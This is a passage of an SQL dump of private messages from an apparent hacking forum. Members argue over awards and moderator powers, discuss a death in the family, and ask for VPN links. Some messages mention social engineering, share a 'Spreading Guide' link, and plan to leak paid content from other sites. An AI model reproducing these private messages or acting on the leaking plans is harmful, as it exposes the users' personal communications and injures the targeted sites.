you.\r\n[/quote]\r\nAight can you name why?', '1346101965', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('827', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Also', '0', '[quote=\'iTzIpod\']\r\n[quote=\'Apathy\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'Apathy\']\r\nDo to think I was serious? I was going to remove it.... Also the Fu was not serious either.\r\n[/quote]\r\n\r\nI don\'t care. I still dislike you.\r\n[/quote]\r\nAight can you name why?\r\n[/quote]\r\n\r\nIt just do. I don\'t like your LQ posts. And also your attitude.\r\n[/quote]\r\nFor a mod you sure talk big. Ask joker I think you are a good member and my attitude is not actaully bad. So you maybe do not like me but you do not actually know me.', '1346102249', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('829', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg', '1346102309', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('832', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Why did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]', '1346104025', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('835', '67', '67', '1', 'a:1:{s:2:\"to\";a:5:{i:0;s:2:\"82\";i:1;s:2:\"61\";i:2;s:2:\"67\";i:3;s:2:\"54\";i:4;s:2:\"53\";}}', '5', 'Threads', '0', 'I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. ', '1346104102', '0', '1', '0', '1', '0', '0', '1346142076'); INSERT INTO mybb_privatemessages VALUES('840', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Aight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]', '1346104684', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('843', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n\r\nYes because you can\'t add awards just like that. You have to provide valid reasons. \r\n[/quote]\r\nDude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...', '1346105119', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('846', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n\r\nYes because you can\'t add awards just like that. You have to provide valid reasons. \r\n[/quote]\r\nDude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...\r\n[/quote]\r\n\r\nDude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I?\r\n[/quote]\r\n\r\nTrue I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. ', '1346105906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('849', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n\r\nYes because you can\'t add awards just like that. You have to provide valid reasons. \r\n[/quote]\r\nDude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...\r\n[/quote]\r\n\r\nDude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I?\r\n[/quote]\r\n\r\nTrue I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. \r\n[/quote]\r\n\r\nIt\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. \r\n[/quote]\r\n\r\ngraphics:\r\nhttp://l33thacking.com/showthread.php?tid=237\r\n\r\nse:\r\nhttp://l33thacking.com/showthread.php?tid=21\r\n\r\nhttp://l33thacking.com/showthread.php?tid=5', '1346106406', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('852', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n\r\nYes because you can\'t add awards just like that. You have to provide valid reasons. \r\n[/quote]\r\nDude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...\r\n[/quote]\r\n\r\nDude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I?\r\n[/quote]\r\n\r\nTrue I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. \r\n[/quote]\r\n\r\nIt\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. \r\n[/quote]\r\n\r\ngraphics:\r\nhttp://l33thacking.com/showthread.php?tid=237\r\n\r\nse:\r\nhttp://l33thacking.com/showthread.php?tid=21\r\n\r\nhttp://l33thacking.com/showthread.php?tid=5\r\n[/quote]\r\n\r\nGod.\r\n\r\nI said you only have in the SEing section that\'s why I readded the SE award.\r\n\r\nYou need to have some tutorials or something to get the painter award or show more than 3 artworks of yours with your UID or Username. \r\n[/quote]\r\nWhy use the term god?', '1346107591', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('890', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usertitle', '0', 'Why am I elite... -\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nAight also yea I am trying not to anger him that he will leave. Also is it you who removes my awards?\r\n[quote=\'t3h jok3r\']\r\n2. Your joke sounded too serious and your neg rep made it look you were deadass.\r\n2. You don\'t need him, so it doesn\'t matter if you are on his good side or not. I would recommend not chatting with him, because if he gets upset/angry then he might leave LH which will affect LHs stats. \r\n[quote=\'Apathy\']\r\nWhy did I mess up? Why would I need his help? I am lost.\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nChange your HF usertitle to the following\r\n\r\n\"Wana learn SEing? PM me\"\r\n[/quote]\r\n\r\n\r\nhttp://i1086.photobucket.com/albums/j456/tutorialsandmore83/76116124-6773-422A-8EBD-76B055F16CF9-34066-000001124FC2372C.jpg\r\n[/quote]\r\n\r\nI can\'t help it now, because you messed it up. I don\'t even think you would ever need his help but I will try something. \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n\r\nYes because you can\'t add awards just like that. You have to provide valid reasons. \r\n[/quote]\r\nDude did you seriously take off the graphics award? You give it to ipod but to be blunt he is shit... I am alot better then him. Also I am good at human manipulation I was known for it on hf...\r\n[/quote]\r\n\r\nDude, he has the award because he has made some posts in those sections. You don\'t have any HQ threads in the graphics section. I removed the SEing award because I thought you didn\'t post any threads in it. You have to show that you deserve the award, other wise people on this forum would just simply request it and say that if X can get it without any proof then why can\'t I?\r\n[/quote]\r\n\r\nTrue I have shown only one piece of work in the graphics section and noting in the se section. You have a point. Sorry about that. \r\n[/quote]\r\n\r\nIt\'s OK. Actually I don\'t think you have any threads in the graphics section, you have only in the SEing section. \r\n[/quote]\r\n\r\ngraphics:\r\nhttp://l33thacking.com/showthread.php?tid=237\r\n\r\nse:\r\nhttp://l33thacking.com/showthread.php?tid=21\r\n\r\nhttp://l33thacking.com/showthread.php?tid=5\r\n[/quote]\r\n\r\nGod.\r\n\r\nI said you only have in the SEing section that\'s why I readded the SE award.\r\n\r\nYou need to have some tutorials or something to get the painter award or show more than 3 artworks of yours with your UID or Username. \r\n[/quote]\r\nWhy use the term god?\r\n[/quote]\r\n\r\nNvm, By the way I\'m changing the username colors, stars and userbars around so if any question pops up then let them know also it can take up to 2 hours because I\'m making the userbars as well. \r\n[/quote]', '1346121902', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('892', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'I cannot', '0', 'You are my best friend online I cannot believe this. :\'(', '1346122033', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('894', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'And', '0', 'You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.', '1346122267', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('898', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', 'Hey man, I\'m sorry I haven\'t been extremely active this week, It\'s because of college and things, Ill try my best to make alot of threads this week. More give away\'s things like that.', '1346135984', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('901', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'hey', '0', 'i need a free usa vps ???\r\ndo you have?', '1346146107', '0', '3', '1346146373', '1', '0', '0', '1346146256'); INSERT INTO mybb_privatemessages VALUES('904', '67', '54', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\']\r\ni need a free usa vps ???\r\ndo you have?\r\n[/quote]\r\n\r\nHey :) I only know about One free vps, but i dont know where its located, and its Linux <.<', '1346146373', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('905', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: hey', '0', '[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\ni need a free usa vps ???\r\ndo you have?\r\n[/quote]\r\n\r\nHey :) I only know about One free vps, but i dont know where its located, and its Linux <.<\r\n[/quote]\r\nlink????', '1346146412', '0', '3', '1346146553', '1', '0', '0', '1346146458'); INSERT INTO mybb_privatemessages VALUES('908', '67', '54', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\ni need a free usa vps ???\r\ndo you have?\r\n[/quote]\r\n\r\nHey :) I only know about One free vps, but i dont know where its located, and its Linux <.<\r\n[/quote]\r\nlink????\r\n[/quote]\r\n\r\nhttps://chunkhost.com/', '1346146553', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('909', '67', '67', '54', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: hey', '0', '[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\ni need a free usa vps ???\r\ndo you have?\r\n[/quote]\r\n\r\nHey :) I only know about One free vps, but i dont know where its located, and its Linux <.<\r\n[/quote]\r\nlink????\r\n[/quote]\r\nsorry i need vpn not vps!!!\r\nhttps://chunkhost.com/\r\n[/quote]', '1346146782', '0', '3', '1346149043', '1', '0', '0', '1346149000'); INSERT INTO mybb_privatemessages VALUES('912', '67', '54', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'Sin Cara\']\r\ni need a free usa vps ???\r\ndo you have?\r\n[/quote]\r\n\r\nHey :) I only know about One free vps, but i dont know where its located, and its Linux <.<\r\n[/quote]\r\nlink????\r\n[/quote]\r\nsorry i need vpn not vps!!!\r\nhttps://chunkhost.com/\r\n[/quote]\r\n[/quote]\r\n\r\nhttp://l33thacking.com/showthread.php?tid=123&pid=711', '1346149043', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('964', '67', '138', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"138\";}}', '2', 'Coders', '0', 'Welcome in the Coders club! :)', '1346170114', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('965', '67', '67', '138', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Spreading Guide', '0', 'Here you go http://www.mediafire.com/view/?p01ua4wlwbjqgqc Please +rep if you can.', '1346171824', '0', '1', '0', '1', '0', '2', '1346171859'); INSERT INTO mybb_privatemessages VALUES('966', '138', '67', '138', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Spreading Guide', '0', 'Here you go http://www.mediafire.com/view/?p01ua4wlwbjqgqc Please +rep if you can.', '1346171824', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('968', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. ', '1346177401', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('970', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\']\r\nI was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. \r\n[/quote]\r\n\r\nYeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. ', '1346179454', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('977', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?', '1346195124', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('980', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?\r\n[/quote]\r\n\r\nNo to? \r\n[/quote]\r\nEventually becoming partners on here again. And do you understand the graphics award thing?', '1346198380', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('995', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\nI was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. \r\n[/quote]\r\n\r\nYeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. \r\n[/quote]\r\nStop crying on about Triple H. \r\n[/quote]\r\nYour forum already has a bad reputation. You dont want more', '1346252928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('999', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\nI was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. \r\n[/quote]\r\n\r\nYeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. \r\n[/quote]\r\nStop crying on about Triple H. \r\n[/quote]\r\nYour forum already has a bad reputation. You dont want more\r\n[/quote]\r\n\r\nSuch as? \r\n[/quote]\r\nActually Its the thing about triple h.', '1346254017', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1002', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?\r\n[/quote]\r\n\r\nNo to? \r\n[/quote]\r\nEventually becoming partners on here again. And do you understand the graphics award thing?\r\n[/quote]\r\n\r\nSure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. \r\n[/quote]\r\nThanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet?', '1346259582', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1004', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude! 0.0', '0', 'Please take off my name from the apathy demoted thread... I do not want people to know my hf name.', '1346268125', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1008', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Alrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :)\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nYou want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me.\r\n[/quote]\r\n\r\nI understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. \r\n\r\nWhy?\r\n[/quote]\r\nI removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. \r\n[/quote]\r\n\r\nSure, I would still like to be your friend. \r\n[/quote]\r\nSo no to everything else?\r\n[/quote]\r\n\r\nNo to? \r\n[/quote]\r\nEventually becoming partners on here again. And do you understand the graphics award thing?\r\n[/quote]\r\n\r\nSure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. \r\n[/quote]\r\nThanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet?\r\n[/quote]\r\n\r\nI told you when I\'m leaving. \r\n[/quote]', '1346288353', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1013', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h 